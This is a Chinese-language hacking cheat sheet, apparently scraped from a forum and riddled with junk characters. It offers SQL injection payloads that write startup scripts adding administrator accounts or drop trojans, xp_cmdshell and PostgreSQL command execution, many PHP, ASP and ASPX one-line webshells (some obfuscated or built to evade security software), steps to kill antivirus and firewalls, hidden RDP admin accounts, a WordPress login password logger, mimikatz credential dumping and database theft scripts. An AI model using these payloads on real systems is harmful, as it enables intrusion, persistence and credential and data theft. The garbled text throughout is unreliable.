1 |. a- d1 X& M+ W* iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 } p" y' S; `- L2 _* K, Sinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
3 e5 |: w; P: [1 J0 Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
D" ~& t; D9 b8 E. N; b/ V" `0 X* tdrop table a;
! x9 f5 {% s! X( A. d7 `1 ~- I% n3 s, B( r
英文版本:7 X8 u+ _& {2 S2 B
) n; P+ r' z4 ?# b; u: p# N1 Quse test;
3 A; n! P6 ?; x( Lcreate table a (cmd text);
: t8 ?1 B* V3 y8 I; U0 b* z; K/ Binsert into a values ("set wshshell=createobject (""wscript.shell"") " );
1 C* F- r1 a' z% _- M4 Y! Kinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
! E8 }5 n) n. qinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
P0 }& j! ~3 e3 Cselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
! [$ x( Y2 C. T( odrop table a;$ A+ |( y3 W u9 P
6 p/ r0 {7 b3 u. O
create table a (cmd BLOB);' m% Y# x7 D3 E
insert into a values (CONVERT(木马的16进制代码,CHAR));# R# l) F# d- P) Y, k( A
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
! z* Z- B8 L! B5 i' E& J* X1 wdrop table a;0 T3 C5 } D2 ]
7 q$ ?/ S7 e: Z" R记录一下怎么处理变态诺顿
( M& {; |7 V n/ c3 _( E查看诺顿服务的路径
( q1 c2 a8 t) v, C) tsc qc ccSetMgr* E' |# t' ` ^" X
然后设置权限拒绝访问。做绝一点。。/ V: L7 `' U& L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
& @; v7 G2 G1 _: s4 n% [3 tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"% i) M; A& Z: L2 Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
" o( n, M- y Z+ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone @" O- A* T' k9 N/ @+ v
& _6 i. d8 K5 `+ o! c然后再重启服务器- C+ r- p) n" h) a5 e% [/ `
iisreset /reboot
- [# p o$ ^) E* ?+ _ m5 X这样就搞定了。。不过完事后。记得恢复权限。。。。' Q3 F0 l9 ~$ `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F5 e% d8 e5 Z3 ], R1 R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F7 \- d3 T( n0 c, b0 F2 S( k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F: w/ }9 t; |1 M! p5 s$ b6 o" ~/ _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
g* Z& { `( k* q% r9 u6 \SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin# B: j3 h5 H9 H% a
$ P/ h. N' a) z: b; h8 @0 w
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
0 l# M- H# W' {& {
: U( }9 b. G6 N c* r4 S6 @ @postgresql注射的一些东西
7 q* [' h) L5 Y8 W, U& _- o如何获得webshell( j& H; i7 l6 ^ O) q
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
. a9 ]6 o4 c% N, ]: Y8 z! \9 Uhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); $ v4 T" s# j% C0 H t' R) o( {
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;/ H/ y& ~" I) L
如何读文件7 P3 ?( }5 K3 u% N6 e# R
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);) @; t6 p a4 Q" v3 r& E) e
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;+ i, G- o+ }8 ?) M
http://127.0.0.1/postgresql.php?id=1;select * from myfile;5 N' i7 S: E) h" I! w- o
- Z" ?) N1 M8 s; O! k1 n: `
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。5 R$ Z! r1 x; A, a( F# s" i
当然,这些的postgresql的数据库版本必须大于8.X
% c0 D2 }4 R* g创建一个system的函数:3 K8 |: C6 W8 [
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
4 `0 K" }: Q/ L1 z! w/ b3 i* c
创建一个输出表:
* z w* [; o/ a. A: ?CREATE TABLE stdout(id serial, system_out text)
2 |/ \! c9 f8 L2 r& }! B( Y' z$ L! A3 ?
执行shell,输出到输出表内:8 M, ~' q9 }+ g1 j/ K5 G' e
SELECT system('uname -a > /tmp/test')! \/ b' g" r+ N) c. N2 _
7 g& P0 k- u# M5 \
copy 输出的内容到表里面;
' r/ o2 ~5 m$ @6 q0 a5 J5 R+ kCOPY stdout(system_out) FROM '/tmp/test'
& z0 m5 T. t0 S, L4 Q+ ^; K; ~/ y2 ]: w( _' ]
从输出表内读取执行后的回显,判断是否执行成功
: P6 ^' A5 H8 Z
+ L5 o5 K+ B: h$ V* H# CSELECT system_out FROM stdout
' k Y/ G S2 U% g2 V/ ^下面是测试例子2 m7 i/ N5 e. d9 x% A
* F4 r1 ^5 d3 d
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
$ ^: ?4 X5 A$ M" T9 n9 ~
, x7 O; F" r- S$ d( I+ Q6 H4 `0 T/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'. s! X8 F7 G. D
STRICT --
% ~3 Q/ [/ U7 x8 G$ p t' _4 i# u# L, `3 ? d
/store.php?id=1; SELECT system('uname -a > /tmp/test') --& c- n+ O7 P# k; _& l- }% Z
; {4 t$ h( x# {2 i* O& q1 v/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --5 i* o; `' l9 x7 ?
2 e; _7 w) [- }) w% {% j" a. o
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--+ X1 V- ~3 v& g5 t/ ]$ s+ G
net stop sharedaccess stop the default firewall% j7 B/ Z1 e- u; `4 H- W' t
netsh firewall show show/config default firewall! X! J& z/ x2 S3 m
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall( I& y" G, L6 K0 ~
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall+ b) b8 u ?. I# q" H
修改3389端口方法(修改后不易被扫出)
0 ?% n) I: [! |) m' W y2 Z: M修改服务器端的端口设置,注册表有2个地方需要修改( s# P) r3 A$ _
4 I, G0 X9 X$ Q9 l$ X/ ?1 H: B0 I
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
# y% G ]5 F6 G n4 S+ l* LPortNumber值,默认是3389,修改成所希望的端口,比如6000
' E! _+ I0 _ f1 A$ l( }( W! {
: U- z3 q4 K7 r6 h: k( C+ W第二个地方:" Z' m( `% E F6 ~8 V) w
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
! y6 `( u% ]$ APortNumber值,默认是3389,修改成所希望的端口,比如6000. @ P0 Z, u, S I6 |5 J
& W2 w& J# B! f Y3 |5 d% h
现在这样就可以了。重启系统就可以了
4 T' b" H5 E; N6 g% P: \1 _+ e8 J" \- r, \" X+ H! _ n
查看3389远程登录的脚本
8 y$ g e7 i3 R5 G2 c8 B保存为一个bat文件
5 D4 _& G+ {( G1 a b1 ?$ E8 ?! {date /t >>D:\sec\TSlog\ts.log
# n# T: U! v: S8 ytime /t >>D:\sec\TSlog\ts.log
; q4 }( n) R3 i" A4 ]; gnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
, D6 O) `' {+ q0 B8 U1 k L+ K' dstart Explorer
$ p; K* g6 a) q! Z# N3 k1 ?& w$ H! B! u6 a, ]
mstsc的参数:
( I/ F( x* I& `, `8 d
" T/ ]+ c' C& j3 j; K2 K% e( Q& U远程桌面连接
' C' j, s" ~- r& a. \& F' l
, x+ T) F* S6 m1 ?! TMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]* m- Y* j# l1 D! c
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 d5 q! x4 P. b+ }5 u3 S) \3 _. j6 h& B! \+ S6 `5 Z) s" ?1 b
<Connection File> -- 指定连接的 .rdp 文件的名称。
7 { T8 G1 v0 r1 x6 h, `+ z" Q n o/ q; w
/v:<server[:port]> -- 指定要连接到的终端服务器。
( P }) i, q6 I; A9 L( \2 L6 ^7 L1 K$ e% X' c3 x
/console -- 连接到服务器的控制台会话。5 A) U& s3 j3 O/ A x2 N/ a# A: z
( ^" }) y& S$ U" l& V+ S5 c9 w
/f -- 以全屏模式启动客户端。1 k/ y. Z# J( r( v) Y9 R7 w( A
! l* {; w) M) m+ ]8 N/w:<width> -- 指定远程桌面屏幕的宽度。; Y1 G0 B/ U5 A' {* w( h
t) N" {3 M5 p. A% V5 P) X/h:<height> -- 指定远程桌面屏幕的高度。; g! F( K3 I7 ?2 ?8 m7 A
/ b+ `& M0 b' R7 s3 l3 S' `
/edit -- 打开指定的 .rdp 文件来编辑。
% d9 f, O' m" P2 l/ }( A, S
$ {. T1 P% }( |! j7 g/migrate -- 将客户端连接管理器创建的旧版
0 U d+ q* g! w# T, P+ g7 u1 X" E0 }& r连接文件迁移到新的 .rdp 连接文件。5 L5 N# i/ y. U& n
4 P2 w" \* w9 \) P. o8 J+ ?+ e
1 b& S" z4 f5 c3 M, b
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
: U: F9 S6 Q/ Vmstsc /console /v:124.42.126.xxx 突破终端访问限制数量& e3 J0 R# z. @2 |7 y
; y0 B0 o9 ~) [' d. ~/ R. h e命令行下开启33892 z& l0 t) ] I8 |
net user asp.net aspnet /add
: @% `: k7 t$ H9 x! U- rnet localgroup Administrators asp.net /add2 o* S+ J$ n7 {$ R; X% j
net localgroup "Remote Desktop Users" asp.net /add
1 g& W, X/ _% f' qattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
6 s6 K5 X9 Q( t2 L( Hecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
6 i6 X$ n7 w" G0 secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
1 L- a6 `8 I W. O) e+ K7 L5 S0 A) Techo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
, O# V; }( E4 b0 A8 lsc config rasman start= auto6 K8 ?+ w: D5 ~2 F/ O0 j
sc config remoteaccess start= auto- u; `" p% k/ {5 u2 L8 E! C
net start rasman) _# z0 N* b: T+ Z5 z- H
net start remoteaccess$ o) j$ v: y( e0 R, x3 g) Q" e+ @
Media
2 s" S7 |1 q7 K; U<form id="frmUpload" enctype="multipart/form-data"9 [* I) ~% |& e; W2 [+ }
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>3 F0 @0 I! c6 c4 X5 i
<input type="file" name="NewFile" size="50"><br>
7 p! Z5 z" C2 t3 _+ `6 P( L+ p- o4 Q<input id="btnUpload" type="submit" value="Upload">1 B5 p; u+ k6 h& v$ ]1 M
</form>
. w3 n8 {. \. a4 `' G8 p
- s# G: ~! p3 B# a3 i( L$ q2 A3 f& G+ qcontrol userpasswords2 查看用户的密码1 g+ \5 X- ~5 L, j" L
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
% ]4 W# \) M3 M1 F/ X3 V2 D4 jSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. @9 R. R1 E- C6 E1 u( M
# x8 q1 P5 O" D: w3 d
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
^0 d D0 _& z2 v: Z3 K6 ~测试1:4 j7 H' ]) ], F1 b& Z; ~3 K9 _
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- G) y( Y8 \! S: d: r+ Z
: @. G0 ?+ B1 [. |; Y- }+ _4 S, [5 P9 Y+ |测试2:9 k; X: n4 ]) M# a
0 n# f& N0 X$ d7 N) `& C
create table dirs(paths varchar(100),paths1 varchar(100), id int)
: G0 T; g- V, m3 w6 F8 b! m. X/ O9 r2 @ z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" P! E3 M% D& \( ~9 g& t3 b: ]
) s1 z: t: P6 y5 [" uSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
) @! ?# t5 ~5 f1 ]" D关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令, K/ P/ u5 D9 V% \% c' { x
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;/ r8 v9 V- T; m( J( y
net stop mcafeeframework
$ w# m# R u1 J" t" @. |$ cnet stop mcshield3 D4 q$ c$ Z; p/ x6 |
net stop mcafeeengineservice% ^% ]! s2 x3 q3 [% e( D A$ O* G
net stop mctaskmanager% O2 r2 n0 f/ r4 ~
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
2 d$ G9 o6 b9 ?% B* J' j3 _8 \
& w: |. O( j" I p. M VNCDump.zip (4.76 KB, 下载次数: 1) - ]2 s+ m: R0 l w% H
密码在线破解http://tools88.com/safe/vnc.php
' r: W& S- J3 u) S, YVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! S9 v# l* _( W }- q
8 r1 \4 a* u$ w9 D, {4 D
exec master..xp_cmdshell 'net user'
- a" a( I, I# ^% ~6 I3 T/ J8 ~/ n0 Fmssql执行命令。
- ]9 }: L0 d5 N/ h# k# R获取mssql的密码hash查询
/ m. D: x- }+ Uselect name,password from master.dbo.sysxlogins
4 H0 i* d6 u# C9 b0 M" [8 f* d2 p
9 G+ U7 S* r( \" Cbackup log dbName with NO_LOG;
! {: G6 V) L9 w; G) h. G* @2 g" ebackup log dbName with TRUNCATE_ONLY;
1 H. K% e4 h7 \5 d: D X k' SDBCC SHRINKDATABASE(dbName);+ _3 a2 T+ W+ L9 J8 j2 e: K$ I9 g
mssql数据库压缩
( k6 N8 I9 t, P; R& w0 ?* r( B9 X( ^
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK5 [9 r7 Y+ o B% H! E
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
7 n4 \) f# D' O2 J3 I2 T
. a/ n: [- M4 b \backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'$ p, V% {6 H" X
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
+ C, O9 ~% V& L- r, \7 b/ X" T8 D
Discuz!nt35渗透要点:1 Q. T6 f; X# Y, S$ \( W+ T
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default8 z V ]( G" u9 Z$ p2 i
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
# R* w) V. z- G0 @. R. _(3)保存。1 k* C# Z' T0 C4 G3 c
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ f5 k8 a( d. _3 j! h8 j2 ]) ? hd:\rar.exe a -r d:\1.rar d:\website\- X2 d9 X. ^: V" x' w
递归压缩website1 _' t( G" e, S7 N/ b
注意rar.exe的路径
8 O* U6 k' ~2 O7 _( r; z9 }
) h& h' |: O% L) V* }5 A<?php1 _) [* }+ J, z, R# t$ S
2 g* b9 _) X! o+ R4 i$telok = "0${@eval($_POST[xxoo])}";
3 d1 o) |. f, J3 e4 j$ X$ f5 W2 `2 d9 }. ~+ W% u( ^- [) D
$username = "123456";
/ U3 E* Q- K% f+ Z F0 D$ W6 v- q* U
. A6 }1 |$ u: f9 D$userpwd = "123456";
3 V2 O$ R( X& O$ g. X
" a7 _4 B/ U7 E$telhao = "123456";) R# i/ N J! N
H! h g& c& \% N" T J3 h# q$ Z
$telinfo = "123456";
4 G2 v# Q! ]( r* f+ S8 n6 e1 q A- g: r* Y1 O- n* j
?>
6 g% ?+ L& i$ l8 _, l: w6 kphp一句话未过滤插入一句话木马4 }1 O+ f# W6 L* |6 e" d
1 X, J" \8 h4 ]
站库分离脱裤技巧+ X* W6 b& o: n. s; b2 o
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'/ ^5 Q1 d/ A5 [9 ]3 A4 z0 p# S
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
* }3 @' ^$ g. c `& y# c6 l' E& ~: G条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ f7 t- _+ }: w$ H9 P, g7 {
这儿利用的是马儿的专家模式(自己写代码)。& f' X; D) Z5 I: l+ p2 Y7 M1 C: d" Y
ini_set('display_errors', 1);: C" z6 }5 Q6 p2 R$ Y
set_time_limit(0);
j* M+ G- m7 d0 T% K" a; Kerror_reporting(E_ALL);" L# N0 \* O. R0 n6 }* z
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
2 G/ E2 D6 f" k# Kmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
# K! M7 T9 {6 C" t5 s; C; W( G" K3 s2 g$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
3 w- g9 e0 `# q% z$i = 0;
6 a2 h' Z l& n% d9 U$tmp = '';
+ B9 w9 h7 `. ?* G$ fwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {' f6 g) F& x+ I
$i = $i+1;
+ R5 j' U. ?* t- S! y- i! I1 b/ H $tmp .= implode("::", $row)."\n";* a( @) d9 P" h* O
if(!($i%500)){//500条写入一个文件( s. D& E8 c& I/ Q" A" U
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';; M1 J4 @. Z) R! c5 {5 t
file_put_contents($filename,$tmp);
9 Q2 Q: j7 D' p $tmp = '';
# k" `8 ^. n/ S }
! ?! k9 W+ ?: m/ w5 J}
. f6 F) g, V( E @* nmysql_free_result($result);
/ y. m- \' a3 O+ [7 y
! E% \; w& u2 S# R+ V) X2 `* W# x" c( r' s8 ~5 ^
0 b- c8 r8 Z/ I
//down完后delete
a5 M! Q& t$ B# J# h9 x5 V6 l- A( W- k3 H$ o- M# b9 s7 g
1 r9 l9 J4 }+ ^' Y, U* B1 F$ p
ini_set('display_errors', 1);( | K, U2 x6 X
error_reporting(E_ALL);
: g, D( M `8 \$i = 0;
; c& r# @* U$ D6 J8 Lwhile($i<32) {
2 u; E8 K i8 a+ k $i = $i+1;% Q8 M$ R9 i. p, s+ u1 s, { ?
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';6 n8 y9 }& @4 }7 A( }1 ] e0 g
unlink($filename);; f3 b7 s2 B' ~& ~( ]& [% Y" Y7 [6 V
} ) O: p8 `4 r$ t
httprint 收集操作系统指纹
8 u) n. Y# d1 s! `4 T2 U3 @( f扫描192.168.1.100的所有端口6 W5 Z9 e, b% G7 Y* n
nmap –PN –sT –sV –p0-65535 192.168.1.100 z+ g2 G* ^, Z* i8 f+ e6 R( M
host -t ns www.owasp.org 识别的名称服务器,获取dns信息0 W4 [' o: j: }0 l$ v* F' ?
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输/ {5 @9 u* H# o0 [
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
+ I9 `2 r3 I1 F) P0 U) _
# r* k8 `# z! e9 A6 J2 oDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)0 G9 ?- W# x* s7 m f! D
7 r1 y( j' M2 k6 d/ k1 }. w MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
6 f5 K6 z v0 B: h8 S# J* `/ b1 O* S) P$ [6 q
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x; J% X' _ m- X* R3 K
/ ?1 @. Z/ a9 l" q6 | DNSstuff: http://www.dnsstuff.com/ (有多种服务可用), @$ q5 F, U& p
2 ~$ n5 ~3 d$ ?" I1 g# G* B3 r- n+ V
http://net-square.com/msnpawn/index.shtml (要求安装)0 K, ^) [9 P- j; F9 r q8 w% J
7 s7 x* F! I- x tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)1 } r& }4 k6 z( I+ _
2 `) A/ v3 | A1 N: v8 t SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
4 q7 W3 g0 _3 d; S: g" kset names gb2312
1 M/ t! p; Y# a& q, e& k: s导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' W" |3 o P" M) q0 M
8 P! w# d" g& b& Z dmysql 密码修改
; T7 a( e$ X& _* }3 ]2 oUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 3 _6 [! w9 L" H2 p; a% _& U' H3 m
update user set password=PASSWORD('antian365.com') where user='root';* z/ u& o& P$ q# N6 C5 U) F, U
flush privileges;
4 i" [* j4 o5 y! h3 a* g3 u高级的PHP一句话木马后门- l$ h6 a6 n! F4 ]
2 b4 a( g$ b7 ]8 X, j
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀% }# {* D* Y" E, t
; }- G: J4 ]3 c: r' w1 o1、1 _3 I6 c+ E2 j$ s# u0 r
" N: M; ~, x W) R9 |$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
! @$ Y1 W& N0 K# W+ Y7 C, Z6 t/ b8 l$ x. l+ y3 Z
$hh("/[discuz]/e",$_POST['h'],"Access");* L4 W' @$ S0 ]# C! x5 @0 j! X
) s% g- a) C- p1 C( f$ b; E8 i0 W
//菜刀一句话
1 }5 @2 s( N5 }/ X8 d5 @% E" ^6 E$ Y/ U6 x3 p8 g# |
2、& ? @1 [( K$ A5 S
. i7 R0 K n; d7 J' r, h! v2 @$filename=$_GET['xbid'];, _& V( m8 R8 j
" Z' T$ K" R' O; Xinclude ($filename);
4 f' R# j- s8 z& `3 u7 _& ~& @7 |) h( W# O& G+ l
//危险的include函数,直接编译任何文件为php格式运行
, `. U7 K/ E; R* ~" a$ v, v* @! R+ U, K' g6 G
3、3 q3 V1 X! F' t- a$ C; U
4 u$ R! s$ f& e$reg="c"."o"."p"."y";
3 g2 W) u7 N7 n7 ~: L# u9 U6 q k$ E. P0 C. n5 `
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);) V3 Y) t: K$ ^# |
0 t2 q# R, K3 `5 ]
//重命名任何文件' ~& h O' M: J: {* R/ Y/ h, T
6 y" H Z, p; j" }; {4、
( c/ |! i3 o+ s( a6 N8 \( Q( ~- j. [3 X0 e$ K3 P# {6 O4 P4 `
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";# T( X$ r( _9 W2 E$ p
3 b& _' a( @ h' O6 |$gzid("/[discuz]/e",$_POST['h'],"Access"); J% r ~ p. L/ q3 [
) z1 {" y% I; \$ V5 d//菜刀一句话
# c9 ?, F% O h% D, G( p7 F e
4 {3 p o) ^! x& _( `9 ]5、include ($uid);
9 d% K& b4 B: _7 N. r/ D: O. Q& H* U5 e
//危险的include函数,直接编译任何文件为php格式运行,POST
0 P/ i. I- A6 H, M+ g$ K( C5 Y5 `- t3 s5 b* i2 V
& ^" O% Y' G2 [) {) B8 Z; |* U
//gif插一句话" \) M$ t; S; U# r* K- q0 O# G
2 p$ ?0 i8 z& \2 ~2 ]
6、典型一句话
/ Q( ^3 D2 n9 J
7 v; t& _7 V- `" c9 O程序后门代码
6 u4 t. }9 a# ^) _; k6 u<?php eval_r($_POST[sb])?> e4 m1 z' u/ \3 B
程序代码) p8 F: m a1 I- d$ W1 w7 a$ F
<?php @eval_r($_POST[sb])?>4 r9 f# V, t1 u% J3 @
//容错代码7 B% }' o E, E6 c1 C
程序代码6 I: l) N: y- T$ }6 F
<?php assert($_POST[sb]);?>& e; c* E& S3 `% D9 I6 g) B
//使用lanker一句话客户端的专家模式执行相关的php语句
V+ d. E7 Y# U# s4 }( n" E% @程序代码
) ^; J" D, w. t+ O<?$_POST['sa']($_POST['sb']);?>6 H% x9 ^5 A; o* a( S
程序代码( Y0 v" }$ K$ T6 I9 o* k' c
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>) Q. v* S4 x% L) R; u0 a2 G
程序代码
1 w2 |- I! a% p$ i" }, S0 e0 S<?php9 p- I K/ q5 i, L: u2 g& T! t, w
@preg_replace("/[email]/e",$_POST['h'],"error");* B' a- y2 K0 H; C
?>6 ]& R8 E: r0 [+ t
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入* d/ F. O3 i# X5 D! T- q
程序代码
. a7 ?. F; y, ~- o<O>h=@eval_r($_POST[c]);</O>
; f. I0 J$ B# ] N4 i程序代码8 x9 g! f2 \8 k5 x/ h( a1 d" }, E% h
<script language="php">@eval_r($_POST[sb])</script>$ A! `$ {+ d' w' @
//绕过<?限制的一句话
" E' M) a4 h/ G) A
' N D+ O r) d C3 J* B# r4 d" Uhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
- t$ e0 d d4 Q: h详细用法:
& `- \+ {( c/ b7 ~, e! x1、到tools目录。psexec \\127.0.0.1 cmd
7 ~3 T. G7 `! q0 ]# T3 l2、执行mimikatz5 d- P4 V3 a. r. v2 S T5 k+ K+ D
3、执行 privilege::debug
4 q( ^: [2 M8 c8 Q) D' @4、执行 inject::process lsass.exe sekurlsa.dll- [0 O/ G; h& e
5、执行@getLogonPasswords5 }: {+ ?, F, _. o/ h4 y v6 {
6、widget就是密码# J7 L7 J& z* Q+ Z7 m# k1 W
7、exit退出,不要直接关闭否则系统会崩溃。
0 |- s2 y) U9 m. P0 N$ }
4 p; z5 d6 u S/ c) E' x0 R; L% ^ |http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
% N" c3 b0 M6 j
9 _ N- q6 o) Q6 ~自动查找系统高危补丁; `4 k# x& p/ e, m+ r9 h" i m
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
6 R$ t: S2 \4 J J) a( f: C9 V
8 M5 L6 x( C0 W6 P突破安全狗的一句话aspx后门
: J' S) D: ]$ c) C<%@ Page Language="C#" ValidateRequest="false" %>
: l5 p. _ V( h5 S$ ?! ^<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
; ^: z: W2 G. Y, g6 ~5 r% D' u! { Awebshell下记录WordPress登陆密码
l. X' S. }0 P+ M0 jwebshell下记录Wordpress登陆密码方便进一步社工4 v ]! l$ C3 F. P( C* `! [+ g* {
在文件wp-login.php中539行处添加:
% ` v/ O9 @/ k$ K8 \// log password: p( F" o/ h" V- Y7 Y, _% ]' L
$log_user=$_POST['log'];9 H+ W6 X5 @6 O: K$ a7 s
$log_pwd=$_POST['pwd'];* e! h) A% h! ^% z
$log_ip=$_SERVER["REMOTE_ADDR"];# R S' {; U4 U+ s5 H8 i
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 x% z2 S, p* R
$txt=$txt.”\r\n”;
/ J9 w8 T1 }& x/ e; u/ Nif($log_user&&$log_pwd&&$log_ip){
4 f; H, T& m; I) l6 [' Y@fwrite(fopen(‘pwd.txt’,”a+”),$txt);+ D1 q, p- j# o% R% y9 W
}/ Y& J. e$ e! e$ {: i
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
3 W) K: V9 p5 d, T" n% X2 d就是搜索case ‘login’3 s' z* p9 D# v" U0 j- b
在它下面直接插入即可,记录的密码生成在pwd.txt中,$ W& [: E7 K9 t+ B* ]
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录% `( }8 {1 s& ^2 S/ u; h
利用II6文件解析漏洞绕过安全狗代码:
+ w; Q5 X% ~4 z/ D;antian365.asp;antian365.jpg
